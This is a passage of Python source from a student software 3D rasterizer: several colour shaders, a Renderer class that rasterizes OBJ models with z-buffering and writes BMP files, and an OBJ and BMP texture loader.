        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    # Invert each channel: |c - 1| maps a value in [0,1] to 1 - c.
    b = mate.valAbsoluto(b - 1)
    g = mate.valAbsoluto(g - 1)
    r = mate.valAbsoluto(r - 1)
    if intensity > 0:
        return r * intensity, g * intensity, b * intensity
    return 0, 0, 0
def shader2(render, **kwargs):
    """Gradient shading: tint each channel by one barycentric coordinate."""
    A, B, C = kwargs['verts']
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    # Weighting each channel by a barycentric coordinate produces a
    # per-triangle colour gradient.
    b *= u
    g *= v
    r *= w
    if intensity > 0:
        return r * intensity, g * intensity, b * intensity
    return 0, 0, 0
def shader3(render, **kwargs):
    """Rock-like shading: channels randomised, weighted by barycentric u.

    NOTE(review): output is non-deterministic (uses ``random``), so the
    same fragment shades differently on every call.
    """
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b /= 255
    g /= 255
    r /= 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    # Per-fragment random speckle, scaled by the u coordinate.
    b *= random.random() * u
    g *= random.random() * u
    r *= random.random() * u
    b *= intensity
    g *= intensity
    r *= intensity
    if intensity > 0:
        return r, g, b
    return 0, 0, 0
    # BUG FIX: removed ~35 lines of dead code that followed this return in
    # the original (a second full shader body -- texture sampling plus
    # lighting -- that could never execute).
def glow(render, **kwargs):
    """Rim-glow shading: lit base colour plus a yellow edge glow that grows
    as the surface turns away from the camera."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated UV.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    if intensity <= 0:
        intensity = 0
    b *= intensity
    g *= intensity
    r *= intensity
    # Third column of the camera matrix is used as the camera-forward vector.
    camForward = [render.camMatrix[0][2],
                  render.camMatrix[1][2],
                  render.camMatrix[2][2]]
    # Rim factor: small facing the camera, large edge-on.
    glowAmount = 1 - mate.productoPunto(normal, camForward)
    glowColor = [1, 1, 0]
    # Add the glow and clamp each channel to 1.
    r = min(r + glowColor[0] * glowAmount, 1)
    g = min(g + glowColor[1] * glowAmount, 1)
    b = min(b + glowColor[2] * glowAmount, 1)
    return r, g, b
def shader4(render, **kwargs):
    """Fire-like shading: light intensity selects a colour along a
    yellow-to-red ramp (red stays at full strength throughout)."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b /= 255
    g /= 255
    r /= 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    # Colour ramp: (lower threshold, (blue, green)) out of 255, brightest
    # first; red is always 255.  Replaces the original 17-branch if/elif
    # ladder with identical output.
    ramp = [(0.95, (0, 255)), (0.94, (1, 254)), (0.93, (2, 253)),
            (0.92, (3, 252)), (0.91, (4, 251)), (0.9, (5, 250)),
            (0.85, (10, 245)), (0.8, (20, 235)), (0.65, (25, 180)),
            (0.5, (20, 140)), (0.4, (15, 100)), (0.3, (10, 80)),
            (0.25, (9, 70)), (0.2, (8, 60)), (0.15, (7, 30)),
            (0.1, (6, 20))]
    blue, green = 3, 10  # darkest band fallback
    for threshold, band in ramp:
        if intensity > threshold:
            blue, green = band
            break
    b *= blue / 255
    g *= green / 255
    r *= 255 / 255
    b *= intensity
    g *= intensity
    r *= intensity
    if intensity > 0:
        return r, g, b
    return 0, 0, 0
def koopa(render, **kwargs):
    """Koopa-palette toon shader: quantizes the diffuse intensity into bands
    of browns blending into blues, multiplied over the active texture color
    when one is set.  Returns (r, g, b) floats in 0..1, or (0, 0, 0) for
    back-facing pixels."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b /= 255
    g /= 255
    r /= 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated coordinates.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Interpolated surface normal.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    if intensity > 1:
        intensity = 1
    # (threshold, r, g, b) quantization bands, highest threshold first.
    bands = [(0.95, 183, 129, 6), (0.94, 180, 125, 6), (0.93, 175, 120, 6),
             (0.92, 173, 118, 6), (0.91, 170, 115, 6), (0.9, 165, 110, 6),
             (0.85, 160, 105, 6), (0.8, 155, 100, 6), (0.65, 155, 10, 6),
             (0.5, 20, 140, 255), (0.4, 15, 100, 255), (0.3, 10, 80, 255),
             (0.25, 9, 70, 255), (0.2, 8, 60, 255)]
    for threshold, rVal, gVal, bVal in bands:
        if intensity > threshold:
            break
    else:
        rVal, gVal, bVal = 0, 91, 11  # darkest band
    r *= rVal / 255
    g *= gVal / 255
    b *= bVal / 255
    b *= intensity
    g *= intensity
    r *= intensity
    if intensity > 0:
        return r, g, b
    return 0, 0, 0
def transparencia(render, **kwargs):
    """Scanline-transparency shader: textured diffuse shading where every
    odd pixel row inside the triangle is painted black, giving a dithered
    see-through look.

    kwargs:
        baryCoords: (u, v, w) barycentric coordinates of the pixel
        texCoords:  per-vertex texture coordinates
        color:      base (b, g, r) color, 0-255 range
        normals:    per-vertex normals
        heightY:    (maxY, minY, y) — triangle's vertical extent and current row
    Returns (r, g, b) floats in 0..1, or (0, 0, 0) for back-facing pixels.
    """
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    maxY, minY, y = kwargs['heightY']
    b /= 255
    g /= 255
    r /= 255
    if render.active_texture:
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    nX = nA[0] * u + nB[0] * v + nC[0] * w
    nY = nA[1] * u + nB[1] * v + nC[1] * w
    nZ = nA[2] * u + nB[2] * v + nC[2] * w
    normal = (nX, nY, nZ)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    if intensity > 1:
        intensity = 1
    # Fix: the original looped `for x in range(minY, maxY, 2)` re-testing the
    # same y-parity condition on every iteration without ever using the loop
    # variable.  The body could only run when the range was non-empty
    # (minY < maxY), so the loop collapses to this single check.
    if minY < maxY and y % 2 != 0:
        b = 0
        g = 0
        r = 0
    b *= intensity
    g *= intensity
    r *= intensity
    if intensity > 0:
        return r, g, b
    else:
        return 0, 0, 0
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,709 | campeon19/Engine3D_Graficas | refs/heads/main | /gl.py | # Christian Daniel Perez De Leon 19710
import struct
from collections import namedtuple
from obj import Obj
from numpy import sin, cos, tan
import matematica as mate
# Lightweight immutable vector types used throughout the renderer:
# 2D screen points, 3D positions/directions, 4D homogeneous coordinates.
V2 = namedtuple('Point2', ['x', 'y'])
V3 = namedtuple('Point3', ['x', 'y', 'z'])
V4 = namedtuple('Point4', ['x', 'y', 'z', 'w'])
def char(c):
    """Pack a single ASCII character as 1 byte (BMP header helper)."""
    encoded = c.encode('ascii')
    return struct.pack('=c', encoded)
def word(w):
    """Pack an integer as a 2-byte little-endian word (BMP header helper)."""
    return struct.pack('=h', w)
def dword(d):
    """Pack an integer as a 4-byte little-endian double word (BMP header helper)."""
    return struct.pack('=l', d)
def _color(r, g, b):
return bytes([ int(b * 255), int(g * 255), int(r * 255)])
def baryCoords(A, B, C, P):
    """Barycentric coordinates of point P with respect to triangle ABC.

    A, B, C, P are 2D points exposing .x / .y attributes.
    Returns (u, v, w) — u weights A, v weights B, w weights C, u+v+w == 1.
    Returns (-1, -1, -1) for a degenerate (zero-area) triangle.
    """
    try:
        # Shared denominator: twice the signed area of triangle ABC.
        # (Hoisted — the original computed it twice.)
        areaABC = (B.y - C.y) * (A.x - C.x) + (C.x - B.x) * (A.y - C.y)
        # area(PCB) / area(ABC)
        u = ((B.y - C.y) * (P.x - C.x) + (C.x - B.x) * (P.y - C.y)) / areaABC
        # area(PCA) / area(ABC)
        v = ((C.y - A.y) * (P.x - C.x) + (A.x - C.x) * (P.y - C.y)) / areaABC
        w = 1 - u - v
    except ZeroDivisionError:
        # Fix: catch only the division error instead of a bare `except:`,
        # which also swallowed programming errors (e.g. AttributeError).
        return -1, -1, -1
    return u, v, w
# Default palette: clear color is black, draw color is white.
BLACK = _color(0,0,0)
WHITE = _color(1,1,1)
class Renderer(object):
    """Software rasterizer: renders Wavefront OBJ models through a
    viewport/projection/view matrix pipeline into a z-buffered pixel grid,
    then writes the result as a 24-bit BMP (glFinish)."""
    def __init__(self, width, height):
        # Order matters: glViewMatrix() must run before glCreateWindow(),
        # because glViewport -> glProjectionMatrix reads viewport fields.
        self.curr_color = WHITE
        self.clear_color = BLACK
        self.glViewMatrix()
        self.glCreateWindow(width, height)
        self.active_texture = None      # diffuse Texture sampled by shaders
        self.normal_map = None          # optional normal-map Texture
        self.background = None          # optional background Texture
        self.active_shader = None       # callable(render, **kwargs) -> (r, g, b)
        self.directional_light = V3(0,0,1)  # light direction used by shaders
    def glCreateWindow(self, width, height):
        """Size the framebuffer and reset viewport to cover the whole window."""
        self.width = width
        self.height = height
        self.glClear()
        self.glViewport(0,0, width, height)
    def glViewport(self, x, y, width, height):
        """Define the viewport rectangle and rebuild the NDC->screen matrix."""
        self.vpX = x
        self.vpY = y
        self.vpWidth = width
        self.vpHeight = height
        # Maps NDC [-1,1] to screen coords; z is remapped from [-1,1] to [0,1].
        self.viewportMatrix = ([[width/2, 0, 0, x + width/2],
                                [0, height/2, 0, y + height/2],
                                [0, 0, 0.5, 0.5],
                                [0, 0, 0, 1]])
        self.glProjectionMatrix()
    def glClearColor(self, r, g, b):
        """Set the clear color from normalized (0..1) RGB components."""
        self.clear_color = _color(r, g, b)
    def glClear(self):
        """Fill the framebuffer with the clear color and reset the z-buffer."""
        self.pixels = [[ self.clear_color for y in range(self.height)] for x in range(self.width)]
        self.zbuffer = [[ float('inf') for y in range(self.height)] for x in range(self.width)]
    def glClearBackground(self):
        """Paint the viewport with the background texture, stretched to fit."""
        if self.background:
            for x in range(self.vpX, self.vpX + self.vpWidth):
                for y in range(self.vpY, self.vpY + self.vpHeight):
                    # Normalized texture coordinates across the viewport.
                    tx = (x - self.vpX) / self.vpWidth
                    ty = (y - self.vpY) / self.vpHeight
                    self.glPoint(x, y, self.background.getColor(tx, ty))
    def glViewportClear(self, color = None):
        """Fill the entire viewport with *color* (or the current draw color)."""
        for x in range(self.vpX, self.vpX + self.vpWidth):
            for y in range(self.vpY, self.vpY + self.vpHeight):
                self.glPoint(x, y, color)
    def glColor(self, r, g, b):
        """Set the current draw color from normalized (0..1) RGB components."""
        self.curr_color = _color(r,g,b)
    def glPoint(self, x, y, color = None):
        """Write one pixel in screen coordinates, clipped to the viewport."""
        if x < self.vpX or x >= self.vpX + self.vpWidth or y < self.vpY or y >= self.vpY + self.vpHeight:
            return
        # NOTE(review): `0 < x` / `0 < y` skip column 0 and row 0 — probably
        # intended to be `0 <= x` / `0 <= y`; confirm before changing.
        if (0 < x < self.width) and (0 < y < self.height):
            self.pixels[int(x)][int(y)] = color or self.curr_color
    def glVertex(self, x, y, color = None):
        """Write one pixel given normalized device coordinates in [-1, 1].

        NOTE(review): pixelX/pixelY are computed but never used — the final
        write indexes with the raw NDC x, y, which looks like a bug; it
        probably should use pixelX/pixelY.  Confirm before fixing.
        """
        if x < -1 or x > 1:
            return
        if y < -1 or y > 1:
            return
        pixelX = (x+1) * (self.vpWidth / 2) + self.vpX
        pixelY = (y+1) * (self.vpHeight / 2) + self.vpY
        if (0 < x < self.width) and (0 < y < self.height):
            self.pixels[int(x)][int(y)] = color or self.curr_color
    def glLine(self, v0, v1, color = None):
        """Draw a line from v0 to v1 (integer screen coords) using an
        incremental slope/offset algorithm (Bresenham-style)."""
        points = []
        x0 = v0.x
        x1 = v1.x
        y0 = v0.y
        y1 = v1.y
        # Degenerate line: a single point.
        if x0 == x1 and y0 == y1:
            self.glPoint(x0,y1, color)
            return points
        dx = abs(x1 - x0)
        dy = abs(y1 - y0)
        steep = dy > dx
        # For steep lines, iterate over y by swapping the axes.
        if steep:
            x0, y0 = y0, x0
            x1, y1 = y1, x1
        # Always iterate left-to-right.
        if x0 > x1:
            x0, x1 = x1, x0
            y0, y1 = y1, y0
        dx = abs(x1 - x0)
        dy = abs(y1 - y0)
        offset = 0
        limit = 0.5
        m = dy/dx
        y = y0
        for x in range(x0, x1 + 1):
            if steep:
                self.glPoint(y, x, color)
            else:
                self.glPoint(x, y, color)
            # Step y whenever the accumulated slope crosses the next half-pixel.
            offset += m
            if offset >= limit:
                y += 1 if y0 < y1 else -1
                limit += 1
    def glLoadModel(self, filename, transalate = V3(0.0,0.0,0.0), scale = V3(1,1,1), rotation = V3(0,0,0)):
        """Load an OBJ file, apply the model transform, and rasterize each
        face with glTriangle_bc (quads are split into two triangles).
        Normals are rotated only (no translation/scale)."""
        model = Obj(filename)
        modelMatrix = self.glCreateObjectMatrix(transalate, scale, rotation)
        rotationMatrix = self.glCreateRotationMatrix(rotation)
        for cara in model.caras:
            vertCount = len(cara)
            # OBJ indices are 1-based: face entries are (vertex, texcoord, normal).
            vert0 = model.vertices[cara[0][0] - 1]
            vert1 = model.vertices[cara[1][0] - 1]
            vert2 = model.vertices[cara[2][0] - 1]
            vt0 = model.texturacoordenadas[cara[0][1] - 1]
            vt1 = model.texturacoordenadas[cara[1][1] - 1]
            vt2 = model.texturacoordenadas[cara[2][1] - 1]
            vn0 = self.glDirTransform(model.normales[cara[0][2] - 1], rotationMatrix)
            vn1 = self.glDirTransform(model.normales[cara[1][2] - 1], rotationMatrix)
            vn2 = self.glDirTransform(model.normales[cara[2][2] - 1], rotationMatrix)
            if vertCount == 4:
                vn3 = self.glDirTransform(model.normales[cara[3][2] - 1], rotationMatrix)
            vert0 = self.glTransform(vert0, modelMatrix)
            vert1 = self.glTransform(vert1, modelMatrix)
            vert2 = self.glTransform(vert2, modelMatrix)
            if vertCount == 4:
                vert3 = model.vertices[cara[3][0] - 1]
                vt3 = model.texturacoordenadas[cara[3][1] - 1]
                vert3 = self.glTransform(vert3, modelMatrix)
            # World space -> screen space (view, projection, viewport).
            a = self.glCamTransform(vert0)
            b = self.glCamTransform(vert1)
            c = self.glCamTransform(vert2)
            if vertCount == 4:
                d = self.glCamTransform(vert3)
            self.glTriangle_bc(a,b,c, texCoords=(vt0,vt1,vt2), normals = (vn0, vn1, vn2), verts=(vert0, vert1, vert2) )
            if vertCount == 4:
                # Second triangle of the quad: (0, 2, 3).
                self.glTriangle_bc(a,c,d,texCoords=(vt0,vt2,vt3), normals = (vn0, vn2, vn3), verts=(vert0, vert2, vert3))
    def glFillTriangle(self, A, B, C, color = None):
        """Fill a 2D triangle with the classic flat-top/flat-bottom split.
        Vertices are sorted by descending y first."""
        if A.y < B.y:
            A, B = B, A
        if A.y < C.y:
            A, C = C, A
        if B.y < C.y:
            B, C = C, B
        def flatBottomTriangle(v1, v2, v3):
            # v1 is the apex (highest y); v2/v3 share the bottom edge.
            try:
                d_21 = (v2.x - v1.x) / (v2.y - v1.y)
                d_31 = (v3.x - v1.x) / (v3.y - v1.y)
            except:
                pass  # zero-height edge: nothing to draw
            else:
                x1 = v2.x
                x2 = v3.x
                for y in range(v2.y, v1.y + 1):
                    self.glLine(V2(int(x1),y), V2(int(x2),y), color)
                    x1 += d_21
                    x2 += d_31
        def flatTopTriangle(v1, v2, v3):
            # v1/v2 share the top edge; v3 is the lowest vertex.
            try:
                d_31 = (v3.x - v1.x) / (v3.y - v1.y)
                d_32 = (v3.x - v2.x) / (v3.y - v2.y)
            except:
                pass  # zero-height edge: nothing to draw
            else:
                x1 = v3.x
                x2 = v3.x
                for y in range(v3.y, v1.y + 1):
                    self.glLine(V2(int(x1),y), V2(int(x2),y), color)
                    x1 += d_31
                    x2 += d_32
        if B.y == C.y:
            flatBottomTriangle(A, B, C)
        elif A.y == B.y:
            flatTopTriangle(A, B, C)
        else:
            # General case: split at the horizontal through B.
            D = V2(A.x + ((B.y - A.y) / (C.y - A.y)) * (C.x - A.x) , B.y)
            flatBottomTriangle(A, B, D)
            flatTopTriangle(B, D, C)
    def glTriangle_bc(self, A, B, C, texCoords = (), normals = (), verts = (), color = None):
        """Rasterize triangle ABC (screen space) via barycentric coordinates,
        with z-buffering; per-pixel color comes from active_shader if set."""
        # Bounding box of the triangle.
        minX = round(min(A.x, B.x, C.x))
        minY = round(min(A.y, B.y, C.y))
        maxX = round(max(A.x, B.x, C.x))
        maxY = round(max(A.y, B.y, C.y))
        for x in range(minX, maxX + 1):
            for y in range(minY, maxY + 1):
                u,v,w = baryCoords(A,B,C, V2(x,y))
                # Inside the triangle iff all barycentric weights are >= 0.
                if u >= 0 and v >= 0 and w >= 0:
                    z = A.z * u + B.z * v + C.z * w
                    if 0<=x<self.width and 0<=y<self.height:
                        # Depth test; z is expected in the NDC range [-1, 1].
                        if z < self.zbuffer[x][y] and z<=1 and z >= -1:
                            if self.active_shader:
                                # heightY feeds shaders that depend on the row
                                # within the triangle (e.g. transparencia).
                                r,g,b = self.active_shader(self, verts = verts , baryCoords = (u,v,w), texCoords = texCoords, normals = normals, color = color or self.curr_color, heightY = (maxY, minY, y))
                            else:
                                b,g,r = color or self.curr_color
                                b/=255
                                g/=255
                                r/=255
                            self.glPoint(x,y, _color(r, g, b))
                            self.zbuffer[x][y] = z
    def glTransform(self, vertex, vMatrix):
        """Apply a 4x4 matrix to a 3D point (homogeneous w=1) and
        perspective-divide back to 3D."""
        augVertex = V4(vertex[0], vertex[1], vertex[2], 1)
        transVertex = mate.multMatrices4xVec(vMatrix, augVertex)
        transVertex = V3(transVertex[0] / transVertex[3],
                         transVertex[1] / transVertex[3],
                         transVertex[2] / transVertex[3])
        return transVertex
    def glDirTransform(self, dirVector, vMatrix):
        """Apply a 4x4 matrix to a direction (homogeneous w=0: rotation only,
        no translation)."""
        augVertex = V4(dirVector[0], dirVector[1], dirVector[2], 0)
        transVertex = mate.multMatrices4xVec(vMatrix, augVertex)
        transVertex = V3(transVertex[0],
                         transVertex[1],
                         transVertex[2])
        return transVertex
    def glCamTransform( self, vertex ):
        """World space -> screen space: viewport * projection * view, then
        perspective divide."""
        augVertex = V4(vertex[0], vertex[1], vertex[2], 1)
        res1 = mate.multMatrices4x4(self.viewportMatrix, self.projectionMatrix)
        res2 = mate.multMatrices4x4(res1, self.viewMatrix)
        transVertex = mate.multMatrices4xVec(res2, augVertex)
        transVertex = V3(transVertex[0] / transVertex[3],
                         transVertex[1] / transVertex[3],
                         transVertex[2] / transVertex[3])
        return transVertex
    def glCreateRotationMatrix(self, rotate=V3(0,0,0)):
        """Build a combined rotation matrix Rx * Ry * Rz from degrees
        (pitch=x, yaw=y, roll=z)."""
        pitch = mate.gradosARadianes(rotate.x)
        yaw = mate.gradosARadianes(rotate.y)
        roll = mate.gradosARadianes(rotate.z)
        rotationX = [[1,0,0,0],
                     [0,cos(pitch),-sin(pitch),0],
                     [0,sin(pitch),cos(pitch),0],
                     [0,0,0,1]]
        rotationY = [[cos(yaw),0,sin(yaw),0],
                     [0,1,0,0],
                     [-sin(yaw),0,cos(yaw),0],
                     [0,0,0,1]]
        rotationZ = [[cos(roll),-sin(roll),0,0],
                     [sin(roll),cos(roll),0,0],
                     [0,0,1,0],
                     [0,0,0,1]]
        res1 = mate.multMatrices4x4(rotationX, rotationY)
        res2 = mate.multMatrices4x4(res1, rotationZ)
        return res2
    def glCreateObjectMatrix(self, translate = V3(0,0,0), scale=V3(1,1,1), rotate = V3(0,0,0)):
        """Build a model matrix: translation * rotation * scale."""
        translateMatrix=[[1,0,0, translate.x],
                         [0,1,0, translate.y],
                         [0,0,1, translate.z],
                         [0,0,0,1]]
        scaleMatrix=[[scale.x,0,0,0],
                     [0,scale.y,0,0],
                     [0,0,scale.z,0],
                     [0,0,0,1]]
        rotationMatrix = self.glCreateRotationMatrix(rotate)
        res1 = mate.multMatrices4x4(translateMatrix, rotationMatrix)
        res2 = mate.multMatrices4x4(res1, scaleMatrix)
        return res2
    def glViewMatrix(self, translate = V3(0,0,0), rotate = V3(0,0,0)):
        """Place the camera and derive the view matrix as its inverse.

        NOTE(review): matematica.matrizInv row-reduces its argument in place,
        so camMatrix is corrupted after this call — shaders that read
        render.camMatrix (e.g. glow) see a reduced matrix.  Confirm and fix
        in matrizInv."""
        self.camMatrix = self.glCreateObjectMatrix(translate,V3(1,1,1),rotate)
        self.viewMatrix = mate.matrizInv(self.camMatrix)
    def glLookAt(self, eye, camPosition = V3(0,0,0)):
        """Aim the camera at *eye* from *camPosition*: build an orthonormal
        right/up/forward basis and invert it into the view matrix."""
        forward = mate.restaVect(camPosition, eye)
        forward = mate.normalizar3D(forward)
        # right = worldUp x forward, then up = forward x right.
        right = mate.productoCruz3D(V3(0,1,0), forward)
        right = mate.normalizar3D(right)
        up = mate.productoCruz3D(forward, right)
        up = mate.normalizar3D(up)
        camMatrix=([[right[0],up[0],forward[0],camPosition.x],
                    [right[1],up[1],forward[1],camPosition.y],
                    [right[2],up[2],forward[2],camPosition.z],
                    [0,0,0,1]])
        self.viewMatrix = mate.matrizInv(camMatrix)
    def glProjectionMatrix(self, n = 0.1, f = 1000, fov = 60 ):
        """Build a perspective projection matrix from near/far planes and a
        vertical field of view in degrees; aspect comes from the viewport."""
        t = tan((fov * mate.pi / 180) / 2) * n
        r = t * self.vpWidth / self.vpHeight
        self.projectionMatrix = ([[n/r, 0, 0, 0],
                                  [0, n/t, 0, 0],
                                  [0, 0, -(f+n)/(f-n), -(2*f*n)/(f-n)],
                                  [0, 0, -1, 0]])
    def glDrawPolygon(self, polygon):
        """Outline a closed polygon given as a sequence of (x, y) pairs."""
        for i in range(len(polygon)):
            self.glLine(V2(polygon[i][0], polygon[i][1]), V2(polygon[(i+1) % len(polygon)][0], polygon[(i+1) % len(polygon)][1]))
    def glScanLine(self):
        """Flood-fill previously outlined shapes by scanning each row for
        pixels drawn in the current color and joining edge pairs.

        NOTE(review): heuristic — assumes outlines were drawn with
        curr_color and relies on the parity of detected edge pixels; the
        odd/even branches below can misfill concave shapes."""
        for y in range (self.height):
            puntos = []
            puntosfiltrados = []
            for x in range (self.width):
                if self.pixels[x][y] == self.curr_color:
                    puntos.append((x,y))
            # Keep only the last pixel of each horizontal run (edge pixels).
            for l in range (0, len(puntos)):
                if (puntos[(l+1) % len(puntos)][0] - puntos[l][0]) != 1:
                    puntosfiltrados.append((puntos[l]))
            if len(puntosfiltrados) == 0:
                pass
            elif len(puntosfiltrados) % 2 == 0:
                # Even count: fill between successive edge pairs.
                for x in range(0, len(puntosfiltrados), 2):
                    self.glLine(V2(puntosfiltrados[x][0], puntosfiltrados[x][1]),V2(puntosfiltrados[(x+1) % len(puntosfiltrados)][0], puntosfiltrados[(x+1) % len(puntosfiltrados)][1]))
            elif len(puntosfiltrados) % 3 == 0:
                # Odd multiple of 3: fill between every consecutive pair.
                for x in range(0, len(puntosfiltrados), 1):
                    self.glLine(V2(puntosfiltrados[x][0], puntosfiltrados[x][1]),V2(puntosfiltrados[(x+1) % len(puntosfiltrados)][0], puntosfiltrados[(x+1) % len(puntosfiltrados)][1]))
            #print(puntos)
    def glFinish(self, filename):
        """Write the framebuffer to *filename* as an uncompressed 24-bit BMP.

        NOTE(review): no row padding is written, so the output is only a
        valid BMP when width * 3 is a multiple of 4 — confirm for arbitrary
        widths."""
        with open(filename, "wb") as file:
            # Header
            file.write(bytes('B'.encode('ascii')))
            file.write(bytes('M'.encode('ascii')))
            file.write(dword(14 + 40 + (self.width * self.height * 3)))
            file.write(dword(0))
            file.write(dword(14 + 40))
            # InfoHeader
            file.write(dword(40))
            file.write(dword(self.width))
            file.write(dword(self.height))
            file.write(word(1))
            file.write(word(24))
            file.write(dword(0))
            file.write(dword(self.width * self.height * 3))
            file.write(dword(0))
            file.write(dword(0))
            file.write(dword(0))
            file.write(dword(0))
            # Color Table
            for y in range(self.height):
                for x in range(self.width):
                    file.write(self.pixels[x][y])
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,710 | campeon19/Engine3D_Graficas | refs/heads/main | /obj.py | # Christian Daniel Perez De Leon 19710
import struct
def _color(r, g, b):
return bytes([ int(b * 255), int(g* 255), int(r* 255)])
class Obj(object):
    """Minimal Wavefront OBJ parser.

    Exposes: vertices (v), texturacoordenadas (vt), normales (vn) as lists
    of float lists, and caras (f) as lists of per-vertex [v, vt, vn] index
    triples (1-based, as stored in the file).
    """
    def __init__(self, filename):
        # Read the whole file up front, then parse line by line.
        with open(filename, 'r') as file:
            self.lines = file.read().splitlines()
        self.vertices = []
        self.texturacoordenadas = []
        self.normales = []
        self.caras = []
        self.read()
    def read(self):
        """Parse self.lines into the vertex/texcoord/normal/face lists.

        NOTE(review): assumes single-space separators and fully-specified
        v/vt/vn face indices — OBJ files with `v//vn` faces or extra spaces
        would break the int() conversion.  Confirm against the models used.
        """
        for line in self.lines:
            if line:
                prefix, value = line.split(' ', 1)
                if prefix == 'v':
                    self.vertices.append(list(map(float, value.split(' '))))
                elif prefix == 'vt':
                    self.texturacoordenadas.append(list(map(float, value.split(' '))))
                elif prefix == 'vn':
                    self.normales.append(list(map(float, value.split(' '))))
                elif prefix == 'f':
                    # Each face vertex is "v/vt/vn" -> [v, vt, vn] ints.
                    self.caras.append( [ list(map(int, vert.split('/'))) for vert in value.split(' ')] )
class Texture(object):
    """Loads a 24-bit BMP into a 2D grid of packed pixels and samples it
    with normalized (0..1) texture coordinates."""
    def __init__(self, filename):
        self.filename = filename
        self.read()
    def read(self):
        """Decode the BMP: header offsets 10 (pixel-data offset) and 18/22
        (width/height), then the bottom-up BGR pixel rows.

        NOTE(review): assumes an uncompressed 24-bpp BMP with no row
        padding (i.e. width * 3 a multiple of 4) — confirm for the
        textures in use."""
        with open(self.filename, "rb") as image:
            image.seek(10)
            headerSize = struct.unpack('=l', image.read(4))[0]
            image.seek(14 + 4)
            self.width = struct.unpack('=l', image.read(4))[0]
            self.height = struct.unpack('=l', image.read(4))[0]
            image.seek(headerSize)
            self.pixels = []
            for y in range(self.height):
                self.pixels.append([])
                for x in range(self.width):
                    # Stored order is BGR; normalize to 0..1 before repacking.
                    b = ord(image.read(1)) / 255
                    g = ord(image.read(1)) / 255
                    r = ord(image.read(1)) / 255
                    self.pixels[y].append( _color(r,g,b) )
    def getColor(self, tx, ty):
        """Sample the texture at normalized (tx, ty); black outside [0, 1).

        NOTE(review): the half-open range excludes tx == 1 / ty == 1, so the
        very last row/column of UV space maps to black — confirm intended.
        """
